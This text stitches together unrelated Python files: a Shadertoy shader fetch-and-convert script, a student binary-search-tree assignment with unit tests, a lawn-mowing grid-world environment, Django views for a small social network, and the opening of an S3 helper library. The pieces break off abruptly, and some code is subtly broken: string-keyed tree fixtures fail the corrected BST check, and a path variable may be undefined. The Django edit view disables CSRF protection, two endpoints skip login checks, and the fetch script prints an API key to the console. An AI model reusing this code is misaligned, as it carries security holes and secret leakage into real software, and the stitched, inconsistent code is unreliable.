    """Write '<conv_name>.<shader_id>.glsl' (all render-pass sources with section markers), unless it exists."""
    glsl_filename = f"{conv_name}.{shader_id}.glsl"
    if os.path.isfile(CONVERSIONS_PATH + glsl_filename):
        return
    # preamble: everything before the first marker is ignored when parsing back
    sections = ['''
// Any text before the first marker ist ignored. //
// Do not delete or change these markers! //
// You may want to do some minimal changes in the //
// following code sections to better support the //
// pattern matching that does the preliminaty GLSL //
// to DCTL conversion. //
''']
    for rp in json_data['renderpass']:
        pass_name = rp['name']
        # marker line padded with underscores to a fixed width
        sections.append('\n// >>> ___ GLSL:[' + pass_name + ']' + ' ' + ('_' * (73 - len(pass_name))) + ' <<<\n')
        sections.append(rp['code'])
    with io.open(CONVERSIONS_PATH + glsl_filename, 'w') as f:
        f.write(''.join(sections))
# ---------------------------------------------------------------------------------------------------------------------
def read_glsl(conv_name, shader_id):
    """
    Get GLSL code from file.

    Splits the '.glsl' file on the '// >>> ___ GLSL:[<name>] ...' markers
    written by `create_glsl()` and returns a dict {pass name: code}.
    """
    path = f"{CONVERSIONS_PATH}{conv_name}.{shader_id}.glsl"
    if not os.path.isfile(path):
        raise Exception(f"{path} does not exists")
    verbose(f"read from {path}")
    with open(path, "r") as f:
        glsl_text = f.read()
    sections = {}
    # the text before the first marker is deliberately dropped ([1:])
    for chunk in glsl_text.split("\n// >>> ___ GLSL:[")[1:]:
        m = re.match(r'([^\]]+)\] _{30,} <<< *\n', chunk)
        if not m:
            raise Exception("broken marker 'GLSL: [" + chunk[0:10] + "...'")
        pass_name = m.group(1)
        if pass_name in sections:
            raise Exception("mulltiple occurences of 'GLSL: [" + pass_name + "]' marker")
        # the code starts right after the marker line
        sections[pass_name] = chunk[chunk.find('\n') + 1:]
    return sections
# ---------------------------------------------------------------------------------------------------------------------
def create_assets(json_data):
    """
    Download every input asset referenced by the shader's render passes.

    Known media (listed in MEDIAMAP) are stored under
    './Assets/<folder>/<name>.<suffix>'; unknown media go to
    './Assets/UNKNOWN/'. Files that already exist locally are skipped.
    No-op when NOASSETS is set.
    """
    if NOASSETS:
        return
    for entry in json_data['renderpass']:
        inputs = entry.get('inputs', None)
        if inputs is None:
            continue
        for input in inputs:
            src = input['src']
            if src is None:
                continue
            media = MEDIAMAP.get(src, None)
            if media is not None:
                # known asset
                filename = selfpath + "./Assets/" + media['folder'] + "/" + media['name'] + "." + media['suffix']
            else:
                # unknown media - flatten the server path into one file name
                filename = selfpath + "./Assets/UNKNOWN/" + re.sub(r'/', '_', src)
            # do nothing if already downloaded
            if os.path.exists(filename):
                # BUG FIX: these f-strings had no placeholder, so the log
                # lines never said WHICH asset was meant
                verbose(f"asset '{filename}' already downloaded")
                continue
            # http get and write file
            verbose(f"download asset '{filename}'")
            data = requests.get("https://www.shadertoy.com" + src)
            with open(filename, 'wb') as f:
                f.write(data.content)
# ---------------------------------------------------------------------------------------------------------------------
def create_dctl(conv_name, shader_id, json_data, glsl_data):
    """
    Create the '<conv_name>.<shader_id>.c' DCTL source, unless it already exists.

    Emits the known render passes in a fixed order, each prefixed with a
    banner comment (plus iChannel wiring hints) and converted through
    `patch_webgl()`. The (possibly hand-edited) code from the .glsl file
    wins over the copy embedded in the JSON.
    """
    dctl_filename = f"{conv_name}.{shader_id}.c"
    if os.path.isfile(CONVERSIONS_PATH+dctl_filename):
        return
    shader_name = json_data['info']['name']
    kernel_name = as_kernel_name(shader_name,shader_id)
    # fixed output order for the code sections
    known_code_parts=['Common','Buffer A','Buffer B','Buffer C','Buffer D','Image','Sound']
    code_parts={}
    for part in known_code_parts:
        code_parts[part]={ 'code' : ''}
    for entry in json_data['renderpass']:
        name = entry['name']
        if not name in known_code_parts:
            raise Exception("unknown code section '"+name+"'")
        if not name in glsl_data:
            raise Exception(f"missing part '{name}' in GLSL")
        code = entry['code']
        # prefer the .glsl file's version if it was edited after fetching
        if code != glsl_data[name]:
            verbose(f"glsl code changed for '{name}'")
            # with io.open(name+'.glsl.txt', 'w') as f:
            #     f.write(glsl_data[name])
            # with io.open(name+'.json.txt', 'w') as f:
            #     f.write(code)
            code = glsl_data[name]
        # banner comment for this section, padded to a fixed width
        header= "\n" \
            "// ----------------------------------------------------------------------------------\n" \
            "// - "+name+(" "*(79-len(name)))+"-\n" \
            "// ----------------------------------------------------------------------------------\n"
        inputs=entry.get('inputs',None)
        if inputs!=None and len(inputs)>0:
            # document which texture/media input belongs on which iChannel
            for input in inputs:
                #header=header + "// Connect '"+input['name']+"' to iChannel"+str(input['channel'])+"\n"
                header=header + "// Connect "+name+" '"+input['name']+"' to iChannel"+str(input['channel'])+"\n"
        code_parts[name]['code'] = header + "\n\n" + patch_webgl(code,kernel_name,name)
    # concatenate the sections in the fixed order (missing ones are empty)
    code=""
    for part in known_code_parts:
        code=code + code_parts[part]['code']
    with open(CONVERSIONS_PATH+dctl_filename, 'w') as f:
        f.write(code)
# ---------------------------------------------------------------------------------------------------------------------
def do_fetch(shader_id):
    """
    Full fetch pipeline for one shader id:
    JSON -> GLSL -> DCTL ('.c') -> assets -> YAML metadata.

    Each create_* step is a no-op when its output file already exists, so
    re-running the fetch does not clobber hand-edited intermediate files.
    """
    conv_name = create_json(shader_id)
    json_data = read_json(conv_name, shader_id)
    create_glsl(conv_name, shader_id, json_data)
    glsl_data = read_glsl(conv_name, shader_id)
    create_dctl(conv_name, shader_id, json_data, glsl_data)
    create_assets(json_data)
    create_yaml(conv_name, shader_id, json_data)
    #yaml_data = read_yaml(conv_name, shader_id)
# =====================================================================================================================
print("\n#################### Fetch Script ###################")
#print("Aufruf :",sys.argv[0]) #ok
# Invoked from another script (argv[0] is not fetch.py): `folder` and `id`
# are then expected to be provided by the exec'ing/importing context.
if sys.argv[0] != "fetch.py" and sys.argv[0] != "./fetch.py":
    selfpath = os.path.dirname(sys.argv[0])+"\\"
    print("#SELFPATH:",selfpath)
    print(sys.argv, len(sys.argv))
    #print("##Argv2##",id,param,txt)
    print("Folder: ",folder)
    # same value as before, but '\\Conversions' avoids the
    # invalid-escape-sequence warning that '\C' triggers
    CONVERSIONS_PATH = selfpath+"\\Conversions\\"+folder+"\\"
    NOASSETS = False
    #VERBOSE = verbose
    ID = id
else:
    # stand-alone invocation: parse the command line
    selfpath = ""
    parser = argparse.ArgumentParser(description='Fetch fuse source code.')
    #parser.add_argument('-f','--force',action='store_true',help='overwrite code if it already exists')
    #parser.add_argument('-a','--assets',action='store_true',help='fetch assets (even if they exist)') # TODO
    parser.add_argument('-i','--id', help='shadertoy id as used in the URL', required=True)
    #parser.add_argument('-nc','--no-cache',action='store_true',help='re-fetch the .json file (assets are not fetched if they exist localy)')
    parser.add_argument('-na','--no-assets',action='store_true',help='do not try to download the assets, even if they are not yet existing')
    parser.add_argument('-v','--verbose',action='store_true',help='verbose output')
    args = parser.parse_args()
    NOASSETS = args.no_assets
    VERBOSE = args.verbose
    ID = args.id
    # NOTE(review): CONVERSIONS_PATH is not assigned on this branch; the print
    # below relies on it being defined earlier in the file - verify.
print("\n##PATH##",CONVERSIONS_PATH)
# BUG FIX: the original check was 'if not(selfpath+".env"):', which is always
# False for a non-empty string, so the .env template was never created.
# Test for file existence, as the commented-out original line intended.
# NOTE(review): the check uses selfpath+".env" but the template is written to
# "./.env" - mismatch when selfpath is non-empty; verify intent.
if not os.path.isfile(selfpath+".env"):
    with open(".env", 'w') as f:
        f.write( "AUTHOR=\"\"\n"
                 "APIKEY=\"\"\n"
                 "DOWNLOADS=\"\"\n"
                 "FUSEPATH=\"\"\n"
                 "REPOPATH=\"\"\n"
               )
    print(".env file created - please enter your credentials to use")
load_dotenv(selfpath+".env")
print("\nENVIRIONMENT ",os.getenv('APIKEY'))
#try:
#    do_fetch(args.id,force=args.force,nocache=args.no_cache,noassets=args.no_assets,nopatch=args.no_patch)
#except Exception as e:
#    print("ERROR: "+str(e))
do_fetch(ID)
#do_fetch(id)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %% [markdown]
# # **Assignment 6** #
# **Delivery Instructions**: Similar to previous assignments. See this [**Canvas announcement**](https://njit.instructure.com/courses/11882/discussion_topics/42914) for more details.
#
# ---
# #### **Important Note**: If you want to follow the alternative track, as I explained in a previous discussions, you can skip questions marked with ^^. Please let me know that you do that !
# %% [markdown]
# ---
# ### **Q1. Check BST validity** ###
# Recall the definition of the Node class which can be used for implementing binary trees. Write a function that takes as input such a tree $T$, and outputs True if $T$ is a valid BST, or False otherwise. [Hint: Think recursion]
# %%
# your implementation goes here
from typing import Tuple
import unittest
class Node:
    """Binary-tree node: a key plus left/right child links (initially empty)."""
    def __init__(self, key):
        self.key = key        # the node's payload / ordering key
        self.lchild = None    # left child, or None
        self.rchild = None    # right child, or None
def checkBSTValidity(T: "Node") -> bool:
    '''Return True iff the binary tree rooted at T is a valid BST.

    BST rules (duplicates allowed on either side, as in the original docstring):
      - every key in a node's left subtree is <= the node's key
      - every key in a node's right subtree is >= the node's key

    BUG FIX: the original returned True as soon as ONE child satisfied the
    local ordering, without ever validating the other subtree - e.g. a root
    with a valid left child and an out-of-order right subtree was accepted.
    This version validates the whole tree with min/max bounds.
    (Note: the string-keyed fixture above compares lexicographically, where
    '10' < '8', so a correct check rejects some of its subtrees.)

    An empty tree (T is None) is considered valid.
    '''
    def _within(node, lo, hi):
        # every key in this subtree must satisfy lo <= key <= hi
        if node is None:
            return True
        if lo is not None and node.key < lo:
            return False
        if hi is not None and node.key > hi:
            return False
        return _within(node.lchild, lo, node.key) and _within(node.rchild, node.key, hi)
    return _within(T, None, None)
# '''
# 5
# / \
# / \
# / \
# 3 8
# / \ / \
# 2 4 7 10
# / \
# 1 12
# '''
class NodeCollection:
    """
    Fixture: the hand-built example tree from the diagram above, using
    *string* keys ('1' .. '12').

            5
           / \\
          3   8
         / \\ / \\
        2  4 7  10
       /          \\
      1            12
    """
    def __init__(self):
        # one node per key, exposed as attribute n<key>
        for key in ('5', '3', '2', '1', '4', '8', '7', '10', '12'):
            setattr(self, 'n' + key, Node(key))
        # wire up the tree structure
        self.n5.lchild, self.n5.rchild = self.n3, self.n8
        self.n3.lchild, self.n3.rchild = self.n2, self.n4
        self.n2.lchild = self.n1
        self.n8.lchild, self.n8.rchild = self.n7, self.n10
        self.n10.rchild = self.n12
        # every node, in ascending numeric key order
        self.all = [self.n1, self.n2, self.n3, self.n4, self.n5,
                    self.n7, self.n8, self.n10, self.n12]

    @property
    def all_nodes(self):
        """The fixture nodes in ascending numeric key order."""
        return self.all
class test_bst_validity(unittest.TestCase):
    """checkBSTValidity over every subtree of the fixture tree."""
    def setUp(self):
        self.nodes = NodeCollection()
        self.all = self.nodes.all_nodes

    def test_all(self):
        for node in self.all:
            self.assertTrue(checkBSTValidity(node),
                            'failed node in {}'.format(node.key))
# %% [markdown]
# ---
#
#
# ### **Q2. Find the height of a Binary Tree**
#
# Write a function *BT_Height* that takes as input a binary tree and computes its height. [Hint: Again, think recursion]
#
# Side Note: If a BST is fully balanced then its height is exactly $\lceil \log_2 n \rceil$. So, the height computation allows you to check if a tree is fully balanced.
# %%
# your implementation goes here
def BT_Height(T, h=None) -> int:
    """
    Height of the binary tree rooted at T, counting the root as level 1.

    `h` is the accumulated depth of T's parent; callers normally omit it.
    """
    depth = 1 if h is None else h + 1
    # a leaf terminates the path at the current depth
    if T.lchild is None and T.rchild is None:
        return depth
    deepest = 0
    for child in (T.lchild, T.rchild):
        if child is not None:
            deepest = max(deepest, BT_Height(child, depth))
    return deepest
class test_bst_height(unittest.TestCase):
    """BT_Height on the fixture tree (the root counts as level 1)."""
    def setUp(self):
        self.nodes = NodeCollection()
        self.all = self.nodes.all_nodes

    def test_height_n5(self):
        root = self.all[4]  # node '5' (the root)
        height = BT_Height(root)
        print('key is {}'.format(root.key))
        self.assertEqual(4, height, 'height from root')

    def test_height_n8(self):
        subtree = self.all[6]  # node '8'
        height = BT_Height(subtree)
        print('key is {}'.format(subtree.key))
        self.assertEqual(3, height, 'height from root')

    def test_log2height(self):
        import math
        # a fully balanced tree of n nodes has height ceil(log2(n))
        expected = math.ceil(math.log2(len(self.all)))
        self.assertEqual(expected, BT_Height(self.all[4]), 'log and height')
# %% [markdown]
# ---
#
#
# ### **Q3. Find the closest leaf** <br>
#
# Write a function *BT_ClosestLeaf* that takes as input a binary tree and computes the distance of the root to its closest leaf.
# %%
# your code goes here
def BT_ClosestLeaf(T: "Node") -> int:
    """
    Return the number of edges from the root T to its nearest leaf.

    BUG FIXES vs. the original:
      - the return annotation said `Node` although an int is returned
      - the absurd 2**10000 "infinity" sentinel is no longer used in the
        recursion; one-child nodes simply recurse into their existing child
    """
    if T is None:
        # defensive guard kept from the original (effectively "infinite"
        # distance); real trees never reach this through the recursion below
        return 2**10000
    if T.lchild is None and T.rchild is None:
        return 0  # standing on a leaf
    if T.lchild is None:
        return 1 + BT_ClosestLeaf(T.rchild)
    if T.rchild is None:
        return 1 + BT_ClosestLeaf(T.lchild)
    return 1 + min(BT_ClosestLeaf(T.lchild), BT_ClosestLeaf(T.rchild))
class test_root_closest_leaf(unittest.TestCase):
    """Nearest leaf from the fixture root is 2 edges away (5 -> 3 -> 4)."""
    def setUp(self):
        self.nodes = NodeCollection()
        self.all = self.nodes.all_nodes

    def test_root(self):
        root = self.all[4]  # node '5'
        self.assertEqual(2, BT_ClosestLeaf(root), 'leaf distance')
# %% [markdown]
# ---
#
#
# ### **Q4^^**. Sorted array to BST
#
# In the lecture we briefly discussed that inserting keys in a random order, will give a balanced tree with high probability. However, it's likely that the tree will not be fully balanced. Suppose now that we have already a sorted array of elements $S$ and we want to convert it to a **fully** balanced search tree. Write a function that accomplishes that goal
# %%
# output should be a Tree.
def sortedToBST(S: list) -> Node:
    """
    Convert the sorted list S into a fully balanced BST.

    The middle element becomes the root; the halves on either side build
    the subtrees recursively. Returns the root Node, or None for [].
    """
    if not S:
        return None
    middle = len(S) // 2
    root = Node(S[middle])
    root.lchild = sortedToBST(S[:middle])      # elements <= root
    root.rchild = sortedToBST(S[middle + 1:])  # elements >= root
    return root
class test_sorted_to_bst(unittest.TestCase):
    """sortedToBST should produce valid, fully balanced BSTs."""
    def setUp(self):
        self.arr_1 = [1, 2, 3, 4, 5, 6, 7]
        self.nodes = NodeCollection()
        self.all = self.nodes.all_nodes
        self.arr = [n.key for n in sorted(self.all, key=lambda x: x.key)]
        # expected shape for arr_1:
        #        4
        #      /   \
        #     2     6
        #    / \   / \
        #   1   3 5   7

    def test_one(self):
        tree = sortedToBST(self.arr_1)
        valid = checkBSTValidity(tree)
        print_bst(tree)
        self.assertTrue(valid)
        self.assertEqual(3, BT_Height(tree), 'height')

    def test_two(self):
        tree = sortedToBST(self.arr)
        valid = checkBSTValidity(tree)
        print_bst(tree)
        self.assertTrue(valid)
        self.assertEqual(4, BT_Height(tree), 'height')
def print_bst(node: "Node"):
    """Print the keys of the tree rooted at `node` in pre-order, one per line."""
    if not node:
        return
    # BUG FIX: the original read 'print(node.key),' - a Python 2 leftover whose
    # trailing comma built and discarded a 1-tuple in Python 3
    print(node.key)
    print_bst(node.lchild)
    print_bst(node.rchild)
# %% [markdown]
# ---
# ### **Q5. Find Max in BST**
# Write a function *BST_max* that takes as input a BST and returns the maximum key in it. This function should be iterative.
# %%
def BST_max(T: Node) -> int:
    """Iteratively find the maximum key in the BST: walk right to the rightmost node."""
    node = T
    while node.rchild is not None:
        node = node.rchild
    return node.key
class test_find_max_key(unittest.TestCase):
    """BST_max returns the largest key reachable by following right children."""
    def setUp(self):
        self.arr_1 = [1, 2, 3, 4, 5, 6, 7]
        self.nodes = NodeCollection()
        self.all = self.nodes.all_nodes
        self.arr = [n.key for n in sorted(self.all, key=lambda x: x.key)]

    def test_one(self):
        subtree = self.all[6]  # node '8'
        self.assertEqual('12', BST_max(subtree), 'bst max')
# %% [markdown]
# ---
# ### **Q6^^**. Check Red-Black Tree Validity
# In the following cell, I give the definition of a class that can be used to build Red-Black Trees. The *color* attribute is assumed to be 1 or 0, where 1 means 'black' and 0 means 'red'.
# Write a function *checkRBTreeValidity* that takes as input a RB Tree $T$ and outputs True if $T$ satisfies all RB properties we discussed in the lecture, and false otherwise.
#
# **Note 1**: As we discussed in the lecture the 'None' children are considered as black nodes without keys.
#
# **Note 2**: Checking if a RB-Tree is a BST is also part of the question, but for it you can use Q1.
# %%
class RBNode:
    """Red-black tree node. `color` is 1 for black, 0 for red; defaults to black."""
    def __init__(self, key, color=None):
        self.key = key
        self.lchild = None
        self.rchild = None
        self.color = 1 if color is None else color
def checkRBValidity(T: "RBNode"):
    '''Check the red-black properties of the tree rooted at T.

    Returns (is_valid, black_depth). Rules checked (via rb_validity_helper):
      - BST ordering (left child <= parent, right child >= parent)
      - the root is black; None children count as black leaves
      - a red node must not have a red child
      - every root-to-leaf path has the same black depth

    BUG FIX: the original only validated the RIGHT subtree
    (`rb_validity_helper(root.rchild)`), so any violation in the left
    subtree went unnoticed. Both subtrees are now checked and must agree
    on their black depth.
    '''
    if T.color != 1:
        # property: the root must be black
        return False, 0
    ok_left, depth_left = rb_validity_helper(T.lchild)
    ok_right, depth_right = rb_validity_helper(T.rchild)
    # reported depth follows the right subtree, matching the original's output
    return (ok_left and ok_right and depth_left == depth_right), depth_right
def rb_validity_helper(T: RBNode):
    '''return bool and black depth'''
    # None children are treated as black leaves -> they contribute 1.
    if not T:
        return True, 1
    if T.color != 1: # if not black...
        # red nodes do not add to the black depth
        black_count = 0
        if (T.lchild is not None and T.lchild.color == 0): # must be black.
            # red-red violation: a red node with a red LEFT child.
            # NOTE(review): the RIGHT child is never checked here, so a red
            # right child under a red node slips through - verify intent.
            return False, -1
    else:
        black_count = 1
    # normal BST checks.
    # - a node's left child is <= self(parent)
    # - a node's right child is >= self(parent)
    if T.lchild is not None and T.lchild.key > T.key:
        return False, -1
    if T.rchild is not None and T.rchild.key < T.key:
        return False, -1
    r, black_count_r = rb_validity_helper(T.rchild)
    l, black_count_l = rb_validity_helper(T.lchild)
    # valid iff both subtrees are valid and share the same black depth;
    # the depth reported upward follows the right spine (black_count_r).
    return all([r, l, black_count_r == black_count_l]), black_count_r + black_count
def create_RB_bst():
    """
    Build the fixture red-black tree (B = black, R = red):

            7B
           /  \\
         3B    18R
              /   \\
           10B     22B
           /  \\      \\
         8R   11R    26R
    """
    n18 = RBNode(18, 0)
    n10 = RBNode(10, 1)
    n22 = RBNode(22, 1)
    n10.lchild = RBNode(8, 0)
    n10.rchild = RBNode(11, 0)
    n22.rchild = RBNode(26, 0)
    n18.lchild = n10
    n18.rchild = n22
    root = RBNode(7, color=1)
    root.lchild = RBNode(3, 1)
    root.rchild = n18
    return root
class test_RB_BST(unittest.TestCase):
    """The fixture RB tree is valid and has a black depth of 2."""
    def setUp(self):
        self.tree = create_RB_bst()

    def test_exist(self):
        self.assertIsNotNone(self.tree)
        valid, black_depth = checkRBValidity(self.tree)
        self.assertTrue(valid)
        self.assertEqual(2, black_depth)
# %%
if __name__ == '__main__':
    # Run every unittest.TestCase defined in this notebook-style script.
    unittest.main(verbosity=1)
# %%
|
import numpy as np
class environment():
    """
    Lawn-mowing grid world.

    Defines the actions available to the agent, applies them to the
    environment state, and tracks the agent's attributes (position,
    direction, move count). Each grid tile is a 3-character string:
    position 0 encodes the ground type ('9' wood/impassable, '8' tall
    grass, '1' cut grass — see __cut_the_grass), while positions 1 and 2
    record the sides through which the agent entered/exited the tile
    ('1' north, '2' south, '3' east, '4' west).
    """

    def __init__(self, agent_position, agent_direction, environment_shape):
        # agent_position: 2-element list with a coordinate pair [row, col]
        # agent_direction: one of the cardinal characters 'N', 'S', 'E', 'W'
        # environment_shape: shape of the environment matrix
        self.environment_shape = environment_shape
        self.agent_position = agent_position
        self.agent_direction = agent_direction
        self.moves = 0  # number of actions taken so far (reward = -moves)

    def __can_occupy(self, tile):
        """True if the agent may enter `tile`, i.e. it is not wood ('9')."""
        return tile[0] != '9'

    def __cut_the_grass(self, environment_state):
        """If the agent's current tile is tall grass ('8...'), replace it with cut grass ('1...')."""
        row, col = self.agent_position[0], self.agent_position[1]
        if environment_state[row, col][0] == '8':
            current_tile = environment_state[row, col]
            environment_state[row, col] = self.__modify_tile(current_tile, '1', 0)
        return environment_state

    def __modify_tile(self, tile, new_value, position):
        # Return `tile` with `new_value` substituted at `position`.
        # Tiles are kept as strings rather than arrays because it makes
        # one-hot encoding easier (and conversion via numpy.fromstring or
        # list() measured slower than simple string rebuilding).
        if position == 0:
            return new_value + tile[1] + tile[2]
        elif position == 1:
            return tile[0] + new_value + tile[2]
        elif position == 2:
            return tile[0] + tile[1] + new_value
        else:
            # BUG FIX: 'invalid tile index ' + position raised TypeError for
            # int positions, masking the intended error message
            raise Exception('invalid tile index ' + str(position))

    def take_action(self, action, environment_state):
        """Dispatch `action` (1=advance, 2=pivot cw, 3=pivot ccw) and return the updated state."""
        if action == 1:
            updated_environment_state = self.advance(environment_state)
        elif action == 2:
            updated_environment_state = self.pivot_clockwise(environment_state)
        elif action == 3:
            updated_environment_state = self.pivot_counterclockwise(environment_state)
        else:
            # BUG FIX: str() added - concatenating an int raised TypeError
            # instead of this message
            raise Exception('invalid action_id ' + str(action))
        self.moves += 1
        return updated_environment_state

    # Below: all actions the agent can take and how they modify the environment.

    def advance(self, environment_state):
        """
        Advance one space in the direction the agent is currently facing.

        Marks the exit side on the current tile; if the target tile is inside
        the grid and passable, moves there and marks the entry side on the new
        tile. Finally cuts the grass on whichever tile the agent ends up on.
        Returns the updated environment state.
        """
        current_tile = environment_state[self.agent_position[0], self.agent_position[1]]  # for readability
        if self.agent_direction == 'N':
            environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '1', 2)  # exit from north
            if self.agent_position[0]-1 != -1 and self.__can_occupy(environment_state[self.agent_position[0]-1, self.agent_position[1]]):  # if next space can be occupied
                self.agent_position[0] -= 1  # advance
                current_tile = environment_state[self.agent_position[0], self.agent_position[1]]  # redefine: the agent moved
                environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '2', 1)  # enter from south
        elif self.agent_direction == 'S':
            environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '2', 2)  # exit from south
            if self.agent_position[0]+1 != self.environment_shape[0] and self.__can_occupy(environment_state[self.agent_position[0]+1, self.agent_position[1]]):  # if next space can be occupied
                self.agent_position[0] += 1  # advance
                current_tile = environment_state[self.agent_position[0], self.agent_position[1]]  # redefine: the agent moved
                environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '1', 1)  # enter from north
        elif self.agent_direction == 'E':
            environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '3', 2)  # exit from east
            if self.agent_position[1]+1 != self.environment_shape[1] and self.__can_occupy(environment_state[self.agent_position[0], self.agent_position[1]+1]):  # if next space can be occupied
                self.agent_position[1] += 1  # advance
                current_tile = environment_state[self.agent_position[0], self.agent_position[1]]  # redefine: the agent moved
                environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '4', 1)  # enter from west
        elif self.agent_direction == 'W':
            environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '4', 2)  # exit from west
            if self.agent_position[1]-1 != -1 and self.__can_occupy(environment_state[self.agent_position[0], self.agent_position[1]-1]):  # if next space can be occupied
                self.agent_position[1] -= 1  # advance
                current_tile = environment_state[self.agent_position[0], self.agent_position[1]]  # redefine: the agent moved
                environment_state[self.agent_position[0], self.agent_position[1]] = self.__modify_tile(current_tile, '3', 1)  # enter from east
        else:
            raise Exception('unknown direction')
        environment_state = self.__cut_the_grass(environment_state)  # cut the tile the agent now stands on
        return environment_state

    def pivot_clockwise(self, environment_state):
        """Rotate the agent 90° clockwise; the grid itself is unchanged."""
        rotations = {'N': 'E', 'E': 'S', 'S': 'W', 'W': 'N'}
        if self.agent_direction not in rotations:
            raise Exception('unknown direction')
        self.agent_direction = rotations[self.agent_direction]
        return environment_state

    def pivot_counterclockwise(self, environment_state):
        """Rotate the agent 90° counterclockwise; the grid itself is unchanged."""
        rotations = {'N': 'W', 'W': 'S', 'S': 'E', 'E': 'N'}
        if self.agent_direction not in rotations:
            raise Exception('unknown direction')
        self.agent_direction = rotations[self.agent_direction]
        return environment_state

    # Below: getters used to interface with the simulation class.

    def get_done_condition(self, environment_state):
        """True when the lawn is fully mowed (no tall-grass tile remains)."""
        # NOTE(review): assumes untouched tall grass is encoded exactly '800';
        # a tall-grass tile with modified entry/exit digits would not match.
        return ('800' not in environment_state)

    def get_action_space(self):
        """Tuple of possible action ids: 1=advance, 2=pivot_clockwise, 3=pivot_counterclockwise."""
        return (1, 2, 3)

    def get_position(self):
        """Return the agent's current position [row, col]."""
        # BUG FIX: returned self.x, self.y which never exist (AttributeError);
        # the position is stored in self.agent_position
        return self.agent_position

    def get_direction(self):
        """Return the agent's current direction ('N', 'S', 'E' or 'W')."""
        # BUG FIX: returned self.direction which never exists; the attribute
        # is self.agent_direction
        return self.agent_direction

    def get_reward(self):
        """Return the agent's current reward: the negative move count."""
        return -self.moves
from django.contrib.auth import authenticate, login, logout
from django.db import IntegrityError
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator
from django.views.decorators.csrf import csrf_exempt
from .models import User, Post
def index(request):
    """Global feed: every post, newest first, paginated 10 per page."""
    posts = Post.objects.order_by("-timestamp").all()
    paginator = Paginator(posts, 10)
    page_number = request.GET.get('page')
    context = {"allposts": paginator.get_page(page_number)}
    return render(request, "network/index.html", context)
@login_required(login_url='login')
def newpost(request): # only accepts post request
    """Create a post from POST['content'] authored by the logged-in user, then go home."""
    author = User.objects.get(pk=request.user.pk)
    Post(content=request.POST["content"], author=author).save()
    return HttpResponseRedirect(reverse('index'))
@login_required(login_url='login')
def userpage(request, userid):
    """Profile page for `userid`: their posts, newest first, 10 per page."""
    posts = User.objects.get(pk=userid).posts_created.order_by('-timestamp').all()
    paginator = Paginator(posts, 10)
    page_number = request.GET.get('page')
    context = {
        "userdisplayed": User.objects.get(pk=userid),
        "allposts": paginator.get_page(page_number),
    }
    return render(request, "network/userpage.html", context)
@login_required(login_url='login')
def followfeed(request):
    """Render the feed of posts written by users the requester follows."""
    followed_authors = request.user.following.all()
    feed = Post.objects.filter(author__in=followed_authors).order_by('-timestamp')
    paginator = Paginator(feed, 10)
    requested_page = request.GET.get('page')
    return render(request, "network/followfeed.html", {
        "allposts": paginator.get_page(requested_page)
    })
def togglelike(request, postid):
    """Toggle the requesting user's like on the given post (AJAX endpoint).

    Returns the plain-text marker "done" that the front-end JS expects.

    NOTE(review): unlike the page views, this endpoint has no
    @login_required, so an anonymous request fails inside the user lookup;
    confirm the front end only calls it while authenticated.
    """
    post = Post.objects.get(pk=postid)
    # request.user is the authenticated User; the original re-fetched it by
    # pk, which issued a redundant database query.
    liked = request.user.liked_posts
    if post not in liked.all():
        liked.add(post)
    else:
        liked.remove(post)
    return HttpResponse("done")
def togglefollow(request, userdisid):
    """Follow the given user if not yet followed, otherwise unfollow.

    Returns the plain-text marker 'done' expected by the front-end JS.
    NOTE(review): no @login_required here, unlike the page views -- confirm
    this endpoint is only reachable while authenticated.
    """
    target = User.objects.get(pk=userdisid)
    following = request.user.following
    if target in following.all():
        following.remove(target)
    else:
        following.add(target)
    return HttpResponse('done')
# NOTE(review): disabling CSRF on a state-changing view is unsafe; the front
# end should send the CSRF token instead. Kept to preserve the existing API.
@csrf_exempt
def editpost(request):
    """Update a post's content; only the author may edit (AJAX endpoint).

    Returns "done" on success, "error" when the request is malformed, the
    post does not exist, or the requester is not the author.
    """
    content = request.POST.get("content")
    postid = request.POST.get("postid")
    if postid is None:
        # Malformed request: the original crashed with int(None) here.
        return HttpResponse("error")
    try:
        post = Post.objects.get(pk=int(postid))
    except (ValueError, Post.DoesNotExist):
        # Non-numeric id or unknown post: report the same "error" marker the
        # permission check below uses, instead of a 500.
        return HttpResponse("error")
    if post.author != request.user:
        return HttpResponse("error")
    post.content = content
    post.save(update_fields=["content"])
    return HttpResponse("done")
def login_view(request):
    """Authenticate and sign a user in; render the login form on GET."""
    if request.method != "POST":
        return render(request, "network/login.html")
    # Attempt to sign user in with the submitted credentials.
    user = authenticate(
        request,
        username=request.POST["username"],
        password=request.POST["password"],
    )
    # Check if authentication successful; re-show the form on failure.
    if user is None:
        return render(request, "network/login.html", {
            "message": "Invalid username and/or password."
        })
    login(request, user)
    return HttpResponseRedirect(reverse("index"))
def logout_view(request):
    # end the current session and send the visitor back to the public index
    logout(request)
    return HttpResponseRedirect(reverse("index"))
def register(request):
    """Register a new account, log it in, and redirect to the index.

    On GET simply renders the registration form.
    """
    if request.method != "POST":
        return render(request, "network/register.html")

    username = request.POST["username"]
    email = request.POST["email"]
    password = request.POST["password"]
    confirmation = request.POST["confirmation"]

    # Ensure password matches confirmation before touching the database.
    if password != confirmation:
        return render(request, "network/register.html", {
            "message": "Passwords must match."
        })

    # Attempt to create new user; a duplicate username violates the unique
    # constraint and surfaces as an IntegrityError.
    try:
        user = User.objects.create_user(username, email, password)
        user.save()
    except IntegrityError:
        return render(request, "network/register.html", {
            "message": "Username already taken."
        })
    login(request, user)
    return HttpResponseRedirect(reverse("index"))
<filename>s3_library.py
'''Library to encapsulate interactions with AWS S3.
'''
import boto
import fnmatch
import os
import pickle
import sys
from tempfile import NamedTemporaryFile
##with open(os.path.join(os.path.dirname(__file__), 's3_credentials.txt')) as creds:
#with open('/home/ec2-user/code_parallel_stochastic/predictd/s3_credentials.txt') as creds:
# cred_info = dict([elt.strip().split('=') for elt in creds])
